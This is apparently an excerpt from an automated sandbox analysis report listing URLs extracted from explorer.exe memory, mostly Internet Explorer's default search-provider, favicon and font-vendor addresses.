Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: {CFBA71BE-6CCB-11EB-90EB-ECF4BBEA1588}.dat.3.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000017.00000000.851216190.0000000006AD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000017.00000000.841938977.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.3.dr	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml1.3.dr	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: 85-0f8009-68ddb2ab[1].js.4.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml2.3.dr	String found in binary or memory: http://www.live.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: msapplication.xml3.3.dr	String found in binary or memory: http://www.nytimes.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: msapplication.xml4.3.dr	String found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: msapplication.xml5.3.dr	String found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000017.00000000.857393572.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000017.00000000.851454535.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
